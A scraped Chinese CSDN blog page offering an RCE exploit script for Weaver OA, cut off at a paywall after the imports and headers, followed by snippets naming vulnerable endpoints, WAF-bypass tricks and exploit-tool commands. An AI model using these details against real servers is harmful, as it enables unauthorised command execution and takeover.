泛微OA管理系统RCE漏洞利用脚本 ——yzddMr6

最新推荐文章于 2024-07-17 00:00:00 发布
最新推荐文章于 2024-07-17 00:00:00 发布
阅读量3k 收藏 2
点赞数
个人星球:https://yzddmr6.tk/zsxq/
本文链接:https://blog.csdn.net/qq_43147039/article/details/103085179
版权
本文介绍了一个针对泛微OA管理系统的远程代码执行(RCE)漏洞利用脚本,提供了使用方法和源码,并特别强调不得用于非法活动。
摘要由CSDN通过智能技术生成

使用方法

python3 rce.py http://www.baidu.com

20017676-cc85b789feabfa26.png
image

payload是捡的,可以一定程度上bypass waf

源码

随手撸的

import requests
import sys

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Content-Type': 'application/x-www-form-urlencoded'
}


def ex
最低0.47元/天 解锁文章
yzddMr6
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【1day】复现泛微E-Mobile 6.6 存在命令执行漏洞
记录并分享学习安全的知识点..
08-14 1994
E-Mobile一款由上海泛微网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户打造的移动办公产品。E-Mobile 6.6 版本存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
泛微移动平台e-mobile漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 8386
泛微移动平台e-mobile漏洞利用基本信息 漏洞情报编号:vulbox-intel-15244 是否可自动化组件:是 CVE-ID:暂无 发布日期:2022/04/01 15:48:45 CNNVD-ID:暂无 最新更新时间:2022/04/08 18:02:59 CNVD-ID:CNVD-2017-02376
泛微ecology文件搜索_phpStudy后门&泛微RCE&CiscoRCE漏洞分析
weixin_39960147的博客
11-30 561
Author:Hunter0x00 近期漏洞列表1. cve-2019-12922 phpMyAdmin 0day漏洞2. PHPstudy 后门3. CVE-2019-1663 cisco 堆栈缓冲区溢出漏洞4. 泛微 OA RCE5. CVE-2019-4505 websphere 任意文件读取漏洞6. fastjson1.2.61 0day0x01 PHPStudy后门精力实在有限...
【漏洞复现】泛微OA E-Mobile 移动管理平台 lang2sql 任意文件上传漏洞
凝聚力安全团队
06-19 1432
泛微OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
RCE的Bypass骚姿势
blue_fantasy的博客
01-09 834
Text. 提到RCE漏洞, 我们当然想用cat、chmod、whoami、ifconfig、ls等这些操作对不对!像这些敏感命令,防火墙就会进行过滤。还有特殊字符如单引、双引、空格等等 ,防火墙同样会进行过滤 。那么本篇来学习一下在CTF及实际渗透当中利用RCE的一些姿势 空格绕过: 在bash下可以用${IFS}、$IFS$9、<、>、<>、{,}、%20(space)、%09(tab, 在URL上使用较多 ) 这里我测>的时候会卡住,因为>指的是写入,就
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami
泛微oa系统中一些常用的脚本,页面及调整方案更新于
12-13
在对系统⻚页⾯面进⾏行行相关操作时请及时备份,因版本差异较⼤大,可能⽅方法已经不不再适⽤用; 在参考这些⽅方式⽅方法之前请确认最新标准产品是否已经⽀支持; 在对数据库进⾏行行操作建议最好先在测试环境测试后再...
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微OA数据库定时批量备份脚本 批处理对泛微定时备份
08-27
泛微OA(e-office)是一款广泛应用的企业协同办公系统,提供了丰富的功能来帮助企业进行日常管理和流程自动化。在系统运行过程中,数据库中的数据是非常重要的资产,因此定期进行数据库备份是保障业务连续性和数据...
泛微OA办公系统使用培训教程.pptx
09-21
文档知识管理模块是泛微OA办公系统的另一个重要模块,用户可以在这里管理文档和知识。用户可以在这里创建、编辑和查看文档,并且可以根据需要对文档进行分类和检索。 个性化设置是泛微OA办公系统的一个重要功能,...
泛微OA与外部系统ERP集成开发视频教程
08-23
泛微OA流程开发,ecology开发,与外部ERP系统集成开发
Goby POC.zipGoby POC.zip
08-26
Goby POC.zipGoby POC.zipGoby POC.zipGoby POC.zip
泛微E-Mobile 6.0存在命令执行漏洞
xiaokp7的博客
07-30 1567
泛微E-Mobile 6.0爆出存在命令执行漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
泛微E-Mobile 6.0命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-10 1295
泛微E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
【漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
最新发布
凝聚力安全团队
07-17 268
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1118
泛微OA
泛微移动平台e-mobile漏洞利用的修复方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 5281
泛微移动平台e-mobile漏洞利用的修复方案1. 对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定2. 当用户输入限定字符时,立刻转向自定义的错误页,不能使用服务器默认的错误输出方式 3. 对以上标签进行危险字符过滤,禁止('、"、+、%、&、、()、;、and、select等)特殊字符的传入 4. 加密数据库内存储信息 5. 与数据库链接并访问数据时,使用参数化查询方式进行链接访问
2021-泛微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
泛微E-cology OA /weaver/ 代码执行漏洞
weixin_30343157的博客
09-22 1207
泛微E-cology OA /weaver/代码执行漏洞 泛微e-cology OA Beanshell组件远程代码执行 分析文章:https://dwz.cn/bYtnsKwa http://127.0.0.1/weaver/bsh.servlet.BshServlet 若存在如上页面,则用下面数据包进行测试。 POST /weaver/bsh.servl...
泛微oa 漏洞利用工具
09-13
根据提供的引用,目前已经实现了用友、泛微等多个OA漏洞利用工具。其中,泛微OA漏洞利用工具的项目地址是在GitHub上,可以在https://github.com/zhaoyumi/WeaverExploit_All 找到。该工具提供了多种默认的POC,可以用于检测和利用泛微OA的漏洞。使用该工具时,可以通过命令行指定目标URL和相应的POC,如WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc QVD-2023-5012 。 该工具的编译使用方法是先使用go build命令编译,生成WeaverExloit-All.exe可执行文件。编译命令为:go build -o WeaverExloit-All.exe .\main.go。然后,可以通过命令行指定目标URL和相应的POC进行漏洞检测和利用操作。例如,WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2523可以用于检测和利用CVE-2023-2523漏洞。 总结来说,泛微OA漏洞利用工具是一个开源项目,提供了多种默认的POC,可以用于检测和利用泛微OA的漏洞。通过命令行可以指定目标URL和相应的POC进行操作。更多具体的使用方法可以参考该项目的文档或者说明。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值